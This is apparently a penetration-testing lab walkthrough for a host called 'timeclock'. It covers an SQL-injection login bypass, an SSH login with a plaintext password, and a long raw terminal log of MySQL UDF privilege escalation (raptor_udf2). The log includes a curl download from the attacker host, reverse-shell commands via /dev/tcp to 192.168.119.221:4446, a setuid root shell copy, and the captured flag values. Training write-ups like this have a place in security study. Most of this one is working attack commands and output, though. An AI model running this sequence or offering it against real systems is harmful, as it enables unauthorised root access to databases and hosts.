10.11.1.252

http://10.11.1.252:8000/users.php

Time application found with port scan.

http://10.11.1.252:8000/users.php10.11.1.252

Port scan : 8000/tcp open http-alt 8888/tcp open sun-answerbook 22000/tcp open snapenetio a

Port 8000 is a web server which is vulnerable to sqli

' or 1=1--

Will bring you into admin portal where you will find multiple users but j0hn seems to work to ssh into the ssh server at 22000.

ssh j0hn@10.11.1.252 -p 22000 -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-rsa

john password: bzuisJDnuI6WUDl

Doing some enum with linpeas.sh will reveal a mysql server running as root and allows you to login without credentials.

Follow MySQL priv esc page for exploit.

Findings:

rootbash-3.2# cat proof.txt f3e6935371c04420da59db4d1944df1f rootbash-3.2# ls network-secret.txt proof.txt rootbash-3.2# cat network-secret.txt 9be35de7610eb55b8c1aeb6e18bf4c9f

```ssh j0hn@10.11.1.252 -p 22000 -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-rsa j0hn@10.11.1.252's password: Last login: Sun Jan 8 21:16:46 2023 from 192.168.119.221 [j0hn@timeclock ~]$ ls cowroot.c dirtycow dirtycow32 envex.sh hudo.c linpeas.sh payload payload.c pipe pipe.c privesc privest.c [j0hn@timeclock ~]$ curl "http://192.168.119.221:80/lib_mysqludf_sys_32.so -o lib_mysqludf_sys_32.so

[j0hn@timeclock ~]$ curl "http://192.168.119.221:80/lib_mysqludf_sys_32.so" -o lib_mysqludf_sys_32.so

% Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 5696 100 5696 0 0 76561 0 --:--:-- --:--:-- --:--:-- 101k [j0hn@timeclock ~]$ ls -ltra total 976 -rw-r--r-- 1 j0hn j0hn 124 Sep 22 2009 .bashrc -rw-r--r-- 1 j0hn j0hn 176 Sep 22 2009 .bash_profile -rw-r--r-- 1 j0hn j0hn 33 Sep 22 2009 .bash_logout drwxr-xr-x 3 root root 4096 Sep 22 2009 .. -rwxrwxr-x 1 j0hn j0hn 827827 Jan 8 18:45 linpeas.sh -rw-rw-r-- 1 j0hn j0hn 4689 Jan 8 18:57 cowroot.c -rwxrwxr-x 1 j0hn j0hn 16156 Jan 8 19:14 dirtycow32 -rwxrwxr-x 1 j0hn j0hn 16144 Jan 8 19:19 dirtycow -rw-rw-r-- 1 j0hn j0hn 9381 Jan 8 21:06 pipe.c -rwxrwxr-x 1 j0hn j0hn 6914 Jan 8 21:08 pipe -rw-rw-r-- 1 j0hn j0hn 130 Jan 8 21:12 payload.c -rwxrwxr-x 1 j0hn j0hn 5062 Jan 8 21:12 payload -rw-rw-r-- 1 j0hn j0hn 276 Jan 8 21:13 privest.c -rwxrwxr-x 1 j0hn j0hn 5205 Jan 8 21:13 privesc -rwxrwxr-x 1 j0hn j0hn 539 Jan 8 21:30 envex.sh -rw-rw-r-- 1 j0hn j0hn 20527 Jan 8 21:35 hudo.c -rw------- 1 j0hn j0hn 3429 Jan 8 21:51 .bash_history -rw------- 1 j0hn j0hn 191 Jan 8 21:51 .mysql_history drwx------ 2 j0hn j0hn 4096 Jan 9 00:16 .gnupg -rw------- 1 j0hn j0hn 3790 Jan 9 00:22 .viminfo -rw-rw-r-- 1 j0hn j0hn 5696 Jan 9 00:51 lib_mysqludf_sys_32.so drwx------ 3 j0hn j0hn 4096 Jan 9 00:51 . [j0hn@timeclock ~]$ mysql -u root Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 94 Server version: 5.0.77 Source distribution

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> use mysql; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A

Database changed mysql> create table npn(line blob); Query OK, 0 rows affected (0.04 sec)

mysql> pwd -> ; ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'pwd' at line 1 mysql> Aborted [j0hn@timeclock ~]$ pwd /home/j0hn [j0hn@timeclock ~]$ mysql -u root Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 95 Server version: 5.0.77 Source distribution

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> use mysql; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A

Database changed mysql> insert into npn values(load_file('/home/j0hn/lib_mysqludf_sys_32.so')); Query OK, 1 row affected (0.00 sec)

mysql> select * from npn into dumpfile '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/lib_mysqludf_sys.so'; ERROR 1 (HY000): Can't create/write to file '/usr/lib/x86_64-linux-gnu/mariadb19/plugin/lib_mysqludf_sys.so' (Errcode: 2) mysql> show variables like '%plugin%'; +---------------+-------+ | Variable_name | Value | +---------------+-------+ | plugin_dir | | +---------------+-------+ 1 row in set (0.00 sec)

mysql> create function sys_exec returns integer soname 'lib_mysqludf_sys.so'; ERROR 1126 (HY000): Can't open shared library 'lib_mysqludf_sys.so' (errno: 22 lib_mysqludf_sys.so: cannot open shared object file: No such file or directory) mysql> select sys_exec('whoami'); ERROR 1305 (42000): FUNCTION mysql.sys_exec does not exist mysql> select sys_eval('whoami'); ERROR 1305 (42000): FUNCTION mysql.sys_eval does not exist mysql> Aborted [j0hn@timeclock ~]$ mysql -v Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 96 Server version: 5.0.77 Source distribution

Reading history-file /home/j0hn/.mysql_history Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> Writing history-file /home/j0hn/.mysql_history Aborted [j0hn@timeclock ~]$ mysql -V mysql Ver 14.12 Distrib 5.0.77, for redhat-linux-gnu (i686) using readline 5.1 [j0hn@timeclock ~]$ mysql Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 97 Server version: 5.0.77 Source distribution

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> exit Bye [j0hn@timeclock ~]$ ls cowroot.c dirtycow dirtycow32 envex.sh hudo.c lib_mysqludf_sys_32.so linpeas.sh payload payload.c pipe pipe.c privesc privest.c [j0hn@timeclock ~]$ vi raptor_udf2.c [j0hn@timeclock ~]$ gcc -g -c raptor_udf2.c [j0hn@timeclock ~]$ gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so [j0hn@timeclock ~]$ raptor_udf2.o -lc -bash: raptor_udf2.o: command not found [j0hn@timeclock ~]$ ls cowroot.c dirtycow dirtycow32 envex.sh hudo.c lib_mysqludf_sys_32.so linpeas.sh payload payload.c pipe pipe.c privesc privest.c raptor_udf2.c raptor_udf2.o raptor_udf2.so [j0hn@timeclock ~]$ ls -ltra total 988 -rw-r--r-- 1 j0hn j0hn 124 Sep 22 2009 .bashrc -rw-r--r-- 1 j0hn j0hn 176 Sep 22 2009 .bash_profile -rw-r--r-- 1 j0hn j0hn 33 Sep 22 2009 .bash_logout drwxr-xr-x 3 root root 4096 Sep 22 2009 .. -rwxrwxr-x 1 j0hn j0hn 827827 Jan 8 18:45 linpeas.sh -rw-rw-r-- 1 j0hn j0hn 4689 Jan 8 18:57 cowroot.c -rwxrwxr-x 1 j0hn j0hn 16156 Jan 8 19:14 dirtycow32 -rwxrwxr-x 1 j0hn j0hn 16144 Jan 8 19:19 dirtycow -rw-rw-r-- 1 j0hn j0hn 9381 Jan 8 21:06 pipe.c -rwxrwxr-x 1 j0hn j0hn 6914 Jan 8 21:08 pipe -rw-rw-r-- 1 j0hn j0hn 130 Jan 8 21:12 payload.c -rwxrwxr-x 1 j0hn j0hn 5062 Jan 8 21:12 payload -rw-rw-r-- 1 j0hn j0hn 276 Jan 8 21:13 privest.c -rwxrwxr-x 1 j0hn j0hn 5205 Jan 8 21:13 privesc -rwxrwxr-x 1 j0hn j0hn 539 Jan 8 21:30 envex.sh -rw-rw-r-- 1 j0hn j0hn 20527 Jan 8 21:35 hudo.c -rw------- 1 j0hn j0hn 3429 Jan 8 21:51 .bash_history drwx------ 2 j0hn j0hn 4096 Jan 9 00:16 .gnupg -rw-rw-r-- 1 j0hn j0hn 5696 Jan 9 00:51 lib_mysqludf_sys_32.so -rw------- 1 j0hn j0hn 639 Jan 9 01:11 .mysql_history -rw------- 1 j0hn j0hn 3882 Jan 9 01:12 .viminfo -rw-rw-r-- 1 j0hn j0hn 3300 Jan 9 01:12 raptor_udf2.c -rw-rw-r-- 1 j0hn j0hn 3144 Jan 9 01:12 raptor_udf2.o -rwxrwxr-x 1 j0hn j0hn 3788 Jan 9 01:13 raptor_udf2.so drwx------ 3 j0hn j0hn 4096 Jan 9 01:13 . [j0hn@timeclock ~]$ raptor_udf2.o -lc -bash: raptor_udf2.o: command not found [j0hn@timeclock ~]$ gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc [j0hn@timeclock ~]$ mysql -u root -p Enter password: ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: YES) [j0hn@timeclock ~]$ mysql -u root Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 99 Server version: 5.0.77 Source distribution

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> use mysql; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A

Database changed mysql> create table foo(line blob); Query OK, 0 rows affected (0.04 sec)

mysql> insert into foo values(load_file('/home/j0hn/raptor_udf2.so')); Query OK, 1 row affected (0.00 sec)

mysql> select * from foo into dumpfile '/home/j0hn/plugin/raptor_udf2.so'; ERROR 1 (HY000): Can't create/write to file '/home/j0hn/plugin/raptor_udf2.so' (Errcode: 2) mysql> select * from foo into dumpfile '/tmp/plugin/raptor_udf2.so'; ERROR 1 (HY000): Can't create/write to file '/tmp/plugin/raptor_udf2.so' (Errcode: 2) mysql> create function do_system returns integer soname 'raptor_udf2.so'; ERROR 1126 (HY000): Can't open shared library 'raptor_udf2.so' (errno: 22 raptor_udf2.so: cannot open shared object file: No such file or directory) mysql> select * from mysql.func; Empty set (0.00 sec)

mysql> exit Bye [j0hn@timeclock ~]$ nmap 127.0.0.1 --script vulners nmap: unrecognized option --script' Nmap 4.20 ( http://insecure.org ) Usage: nmap [Scan Type(s)] [Options] {target specification} TARGET SPECIFICATION: Can pass hostnames, IP addresses, networks, etc. Ex: scanme.nmap.org, microsoft.com/24, 192.168.0.1; 10.0.0-255.1-254 -iL <inputfilename>: Input from list of hosts/networks -iR <num hosts>: Choose random targets --exclude <host1[,host2][,host3],...>: Exclude hosts/networks --excludefile <exclude_file>: Exclude list from file HOST DISCOVERY: -sL: List Scan - simply list targets to scan -sP: Ping Scan - go no further than determining if host is online -P0: Treat all hosts as online -- skip host discovery -PS/PA/PU [portlist]: TCP SYN/ACK or UDP discovery to given ports -PE/PP/PM: ICMP echo, timestamp, and netmask request discovery probes -n/-R: Never do DNS resolution/Always resolve [default: sometimes] --dns-servers <serv1[,serv2],...>: Specify custom DNS servers --system-dns: Use OS's DNS resolver SCAN TECHNIQUES: -sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans -sU: UDP Scan -sN/sF/sX: TCP Null, FIN, and Xmas scans --scanflags <flags>: Customize TCP scan flags -sI <zombie host[:probeport]>: Idlescan -sO: IP protocol scan -b <ftp relay host>: FTP bounce scan PORT SPECIFICATION AND SCAN ORDER: -p <port ranges>: Only scan specified ports Ex: -p22; -p1-65535; -p U:53,111,137,T:21-25,80,139,8080 -F: Fast - Scan only the ports listed in the nmap-services file) -r: Scan ports consecutively - don't randomize SERVICE/VERSION DETECTION: -sV: Probe open ports to determine service/version info --version-intensity <level>: Set from 0 (light) to 9 (try all probes) --version-light: Limit to most likely probes (intensity 2) --version-all: Try every single probe (intensity 9) --version-trace: Show detailed version scan activity (for debugging) OS DETECTION: -O: Enable OS detection (try 2nd generation w/fallback to 1st) -O2: Only use the new OS detection system (no fallback) -O1: Only use the old (1st generation) OS detection system --osscan-limit: Limit OS detection to promising targets --osscan-guess: Guess OS more aggressively TIMING AND PERFORMANCE: Options which take <time> are in milliseconds, unless you append 's' (seconds), 'm' (minutes), or 'h' (hours) to the value (e.g. 30m). -T[0-5]: Set timing template (higher is faster) --min-hostgroup/max-hostgroup <size>: Parallel host scan group sizes --min-parallelism/max-parallelism <time>: Probe parallelization --min-rtt-timeout/max-rtt-timeout/initial-rtt-timeout <time>: Specifies probe round trip time. --max-retries <tries>: Caps number of port scan probe retransmissions. --host-timeout <time>: Give up on target after this long --scan-delay/--max-scan-delay <time>: Adjust delay between probes FIREWALL/IDS EVASION AND SPOOFING: -f; --mtu <val>: fragment packets (optionally w/given MTU) -D <decoy1,decoy2[,ME],...>: Cloak a scan with decoys -S <IP_Address>: Spoof source address -e <iface>: Use specified interface -g/--source-port <portnum>: Use given port number --data-length <num>: Append random data to sent packets --ip-options <options>: Send packets with specified ip options --ttl <val>: Set IP time-to-live field --spoof-mac <mac address/prefix/vendor name>: Spoof your MAC address --badsum: Send packets with a bogus TCP/UDP checksum OUTPUT: -oN/-oX/-oS/-oG <file>: Output scan in normal, XML, s|<rIpt kIddi3, and Grepable format, respectively, to the given filename. -oA <basename>: Output in the three major formats at once -v: Increase verbosity level (use twice for more effect) -d[level]: Set or increase debugging level (Up to 9 is meaningful) --open: Only show open (or possibly open) ports --packet-trace: Show all packets sent and received --iflist: Print host interfaces and routes (for debugging) --log-errors: Log errors/warnings to the normal-format output file --append-output: Append to rather than clobber specified output files --resume <filename>: Resume an aborted scan --stylesheet <path/URL>: XSL stylesheet to transform XML output to HTML --webxml: Reference stylesheet from Insecure.Org for more portable XML --no-stylesheet: Prevent associating of XSL stylesheet w/XML output MISC: -6: Enable IPv6 scanning -A: Enables OS detection and Version detection --datadir <dirname>: Specify custom Nmap data file location --send-eth/--send-ip: Send using raw ethernet frames or IP packets --privileged: Assume that the user is fully privileged --unprivileged: Assume the user lacks raw socket privileges -V: Print version number -h: Print this help summary page. EXAMPLES: nmap -v -A scanme.nmap.org nmap -v -sP 192.168.0.0/16 10.0.0.0/8 nmap -v -iR 10000 -P0 -p 80 SEE THE MAN PAGE FOR MANY MORE OPTIONS, DESCRIPTIONS, AND EXAMPLES [j0hn@timeclock ~]$ nmap 127.0.0.1 -sV --script vulners nmap: unrecognized option --script' Nmap 4.20 ( http://insecure.org ) Usage: nmap [Scan Type(s)] [Options] {target specification} TARGET SPECIFICATION: Can pass hostnames, IP addresses, networks, etc. Ex: scanme.nmap.org, microsoft.com/24, 192.168.0.1; 10.0.0-255.1-254 -iL : Input from list of hosts/networks -iR : Choose random targets --exclude <host1[,host2][,host3],...>: Exclude hosts/networks --excludefile <exclude_file>: Exclude list from file HOST DISCOVERY: -sL: List Scan - simply list targets to scan -sP: Ping Scan - go no further than determining if host is online -P0: Treat all hosts as online -- skip host discovery -PS/PA/PU [portlist]: TCP SYN/ACK or UDP discovery to given ports -PE/PP/PM: ICMP echo, timestamp, and netmask request discovery probes -n/-R: Never do DNS resolution/Always resolve [default: sometimes] --dns-servers <serv1[,serv2],...>: Specify custom DNS servers --system-dns: Use OS's DNS resolver SCAN TECHNIQUES: -sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans -sU: UDP Scan -sN/sF/sX: TCP Null, FIN, and Xmas scans --scanflags : Customize TCP scan flags -sI <zombie host[:probeport]>: Idlescan -sO: IP protocol scan -b : FTP bounce scan PORT SPECIFICATION AND SCAN ORDER: -p : Only scan specified ports Ex: -p22; -p1-65535; -p U:53,111,137,T:21-25,80,139,8080 -F: Fast - Scan only the ports listed in the nmap-services file) -r: Scan ports consecutively - don't randomize SERVICE/VERSION DETECTION: -sV: Probe open ports to determine service/version info --version-intensity : Set from 0 (light) to 9 (try all probes) --version-light: Limit to most likely probes (intensity 2) --version-all: Try every single probe (intensity 9) --version-trace: Show detailed version scan activity (for debugging) OS DETECTION: -O: Enable OS detection (try 2nd generation w/fallback to 1st) -O2: Only use the new OS detection system (no fallback) -O1: Only use the old (1st generation) OS detection system --osscan-limit: Limit OS detection to promising targets --osscan-guess: Guess OS more aggressively TIMING AND PERFORMANCE: Options which take are in milliseconds, unless you append 's' (seconds), 'm' (minutes), or 'h' (hours) to the value (e.g. 30m). -T[0-5]: Set timing template (higher is faster) --min-hostgroup/max-hostgroup : Parallel host scan group sizes --min-parallelism/max-parallelism : Probe parallelization --min-rtt-timeout/max-rtt-timeout/initial-rtt-timeout : Specifies probe round trip time. --max-retries : Caps number of port scan probe retransmissions. --host-timeout : Give up on target after this long --scan-delay/--max-scan-delay : Adjust delay between probes FIREWALL/IDS EVASION AND SPOOFING: -f; --mtu : fragment packets (optionally w/given MTU) -D <decoy1,decoy2[,ME],...>: Cloak a scan with decoys -S <IP_Address>: Spoof source address -e : Use specified interface -g/--source-port : Use given port number --data-length : Append random data to sent packets --ip-options : Send packets with specified ip options --ttl : Set IP time-to-live field --spoof-mac <mac address/prefix/vendor name>: Spoof your MAC address --badsum: Send packets with a bogus TCP/UDP checksum OUTPUT: -oN/-oX/-oS/-oG : Output scan in normal, XML, s|<rIpt kIddi3, and Grepable format, respectively, to the given filename. -oA : Output in the three major formats at once -v: Increase verbosity level (use twice for more effect) -d[level]: Set or increase debugging level (Up to 9 is meaningful) --open: Only show open (or possibly open) ports --packet-trace: Show all packets sent and received --iflist: Print host interfaces and routes (for debugging) --log-errors: Log errors/warnings to the normal-format output file --append-output: Append to rather than clobber specified output files --resume : Resume an aborted scan --stylesheet <path/URL>: XSL stylesheet to transform XML output to HTML --webxml: Reference stylesheet from Insecure.Org for more portable XML --no-stylesheet: Prevent associating of XSL stylesheet w/XML output MISC: -6: Enable IPv6 scanning -A: Enables OS detection and Version detection --datadir : Specify custom Nmap data file location --send-eth/--send-ip: Send using raw ethernet frames or IP packets --privileged: Assume that the user is fully privileged --unprivileged: Assume the user lacks raw socket privileges -V: Print version number -h: Print this help summary page. EXAMPLES: nmap -v -A scanme.nmap.org nmap -v -sP 192.168.0.0/16 10.0.0.0/8 nmap -v -iR 10000 -P0 -p 80 SEE THE MAN PAGE FOR MANY MORE OPTIONS, DESCRIPTIONS, AND EXAMPLES [j0hn@timeclock ~]$ nmap 127.0.0.1 -sV

Starting Nmap 4.20 ( http://insecure.org ) at 2023-01-09 01:22 EST Interesting ports on localhost (127.0.0.1): Not shown: 1690 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 4.3 (protocol 2.0) 80/tcp open http Apache httpd 2.2.3 ((CentOS)) 111/tcp open rpcbind 2 (rpc #100000) 443/tcp open ssl/http Apache httpd 2.2.3 ((CentOS)) 631/tcp open ipp CUPS 1.2 720/tcp open status 1 (rpc #100024) 3306/tcp open mysql MySQL 5.0.77

Service detection performed. Please report any incorrect results at http://insecure.org/nmap/submit/ . Nmap finished: 1 IP address (1 host up) scanned in 15.000 seconds [j0hn@timeclock ~]$ select * from foo into dumpfile '/usr/lib/raptor_udf2.so'; -bash: syntax error near unexpected token `from' [j0hn@timeclock ~]$ mysql -u root Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 102 Server version: 5.0.77 Source distribution

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> select * from foo into dumpfile '/usr/lib/raptor_udf2.so'; ERROR 1046 (3D000): No database selected mysql> use mysql; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A

Database changed mysql> select * from foo into dumpfile '/usr/lib/raptor_udf2.so'; Query OK, 1 row affected (0.01 sec)

mysql> create function do_system returns integer soname 'raptor_udf2.so'; Query OK, 0 rows affected, 1 warning (0.00 sec)

mysql> select do_system('id > /tmp/out; chown raptor.raptor /tmp/out'); +----------------------------------------------------------+ | do_system('id > /tmp/out; chown raptor.raptor /tmp/out') | +----------------------------------------------------------+ | 4294967296 | +----------------------------------------------------------+ 1 row in set (0.01 sec)

mysql> ! sh sh-3.2$ whoami j0hn sh-3.2$ cat /tmp/out cat: /tmp/out: Permission denied sh-3.2$ cd tmp sh: cd: tmp: No such file or directory sh-3.2$ ls cowroot.c dirtycow dirtycow32 envex.sh hudo.c lib_mysqludf_sys_32.so linpeas.sh payload payload.c pipe pipe.c privesc privest.c raptor_udf2.c raptor_udf2.o raptor_udf2.so sh-3.2$ cd /tmp sh-3.2$ ls out vmware-root sh-3.2$ ls -ltra total 20 drwxr-xr-x 23 root root 4096 Jan 1 12:32 .. drwx------ 2 root root 4096 Jan 1 12:32 vmware-root -rw-rw---- 1 root root 24 Jan 9 01:25 out drwxrwxrwt 3 root root 4096 Jan 9 01:25 . sh-3.2$ exit exit mysql> select do_system('id > /tmp/out; chown j0hn.j0hn /tmp/out'); +------------------------------------------------------+ | do_system('id > /tmp/out; chown j0hn.j0hn /tmp/out') | +------------------------------------------------------+ | 4294967296 | +------------------------------------------------------+ 1 row in set (0.00 sec)

mysql> ! sh sh-3.2$ ls cowroot.c dirtycow dirtycow32 envex.sh hudo.c lib_mysqludf_sys_32.so linpeas.sh payload payload.c pipe pipe.c privesc privest.c raptor_udf2.c raptor_udf2.o raptor_udf2.so sh-3.2$ cd /tmp sh-3.2$ ls out vmware-root sh-3.2$ ls -ltra total 20 drwxr-xr-x 23 root root 4096 Jan 1 12:32 .. drwx------ 2 root root 4096 Jan 1 12:32 vmware-root drwxrwxrwt 3 root root 4096 Jan 9 01:25 . -rw-rw---- 1 j0hn j0hn 24 Jan 9 01:33 out sh-3.2$ cat out uid=0(root) gid=0(root) sh-3.2$ whoami j0hn sh-3.2$ exit exit mysql> select sys_exec('bash -c "bash -i >& /dev/tcp/192.168.119.221/4446 0>&1"'); ERROR 1305 (42000): FUNCTION mysql.sys_exec does not exist mysql> select do_system('bash -c "bash -i >& /dev/tcp/192.168.119.221/4446 0>&1"');

Query aborted by Ctrl+C

Aborted [j0hn@timeclock ~]$ mysql -u root Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 104 Server version: 5.0.77 Source distribution

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> use mysql; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A

Database changed mysql> mysql> select do_system(‘bash -i >& /dev/tcp/192.168.119.22114446 0>&1’); ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '��bash -i >& /dev/tcp/10.92.168.119.22143446>&1’)' at line 1 mysql> select do_system(‘bash -i >& /dev/tcp/10.92.168.119.221/4446>&1’); ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '��bash -i >& /dev/tcp/10.92.168.119.22143/46>&1’)' at line 1 mysql> select do_system(‘bash -i >& /dev/tcp/192.168.119.221/4446 0>&1’); ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '��bash -i >& /dev/tcp/10.92.168.119.221/3 46>&1’)' at line 1 mysql> select do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash'); +------------------------------------------------------------------+ | do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash') | +------------------------------------------------------------------+ | 4294967296 | +------------------------------------------------------------------+ 1 row in set (0.01 sec)

mysql> /tmp/rootbash -p -> ; ERROR 1064 (42000): You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/tmp/rootbash -p' at line 1 mysql> mysql> ! sh sh-3.2$ /tmp/rootbash -p rootbash-3.2# whoami root rootbash-3.2# ls cowroot.c dirtycow dirtycow32 envex.sh hudo.c lib_mysqludf_sys_32.so linpeas.sh payload payload.c pipe pipe.c privesc privest.c raptor_udf2.c raptor_udf2.o raptor_udf2.so rootbash-3.2# cd /root rootbash-3.2# ls network-secret.txt proof.txt rootbash-3.2# cat proof.txt f3e6935371c04420da59db4d1944df1f rootbash-3.2# ls network-secret.txt proof.txt rootbash-3.2# cat network-secret.txt 9be35de7610eb55b8c1aeb6e18bf4c9frootbash-3.2# zsh: killed ssh j0hn@10.11.1.252 -p 22000 -oKexAlgorithms=+diffie-hellman-group1-sha1

Last updated 1 year ago